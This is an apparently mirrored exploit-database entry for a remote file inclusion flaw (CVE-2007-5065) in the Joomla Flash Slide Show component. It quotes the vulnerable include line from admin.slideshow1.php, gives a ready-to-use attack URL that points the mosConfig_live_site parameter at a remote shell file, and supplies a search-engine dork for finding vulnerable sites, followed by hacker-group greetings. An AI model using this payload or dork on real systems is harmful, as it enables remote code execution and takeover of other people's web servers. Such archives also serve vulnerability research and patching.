[] NeoSense
E X P L O I T S
title author type platform port cve id

Joomla! Component com_slideshow - Remote File Inclusion

Author: ShockShadow
type: webapps
platform: php
port: 
date_added: 2007-09-20 
date_updated: 2016-10-12 
verified: 1 
codes: OSVDB-38157;CVE-2007-5065 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcom_slideshow.zip
--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+         Joomla Component Flash Slide Show (admin.slideshow1.php) - RFI         +==--
--==+================================================================================+==--

Script Name:  Joomla Component Flash Slide Show Image Gallery
exploit:      Remote File Inclusion [High Risk]
Author:       ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://www.joomlahacks.com/component/option,com_remository/Itemid,41/func,download/id,491/chk,cb182dd5ecd024f36f7a8fa98dd8935e/
             http://www.box.net/shared/6xeh4doczd
Search Key:   inurl:/com_slideshow/

##############################

Line 3 of admin.slideshow1.php
>    include( "$mosConfig_live_site/components/com_slideshow1/about.html" );
==============

eXploit: http://domain.com/Joomla_Path/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://shell.txt

###############################
by: ShockShadow
GrEEtZ t0:
Mr.HaCkEr, Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, HamzaBX1, Alakrb Almoftres, Falcon Hammdan, RoMaNcYxHaCkEr
Medo Hacker, rUn-vIrUs, Dr.eXe, zAx
AND ALL FRIENDS

# milw0rm.com [2007-09-21]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.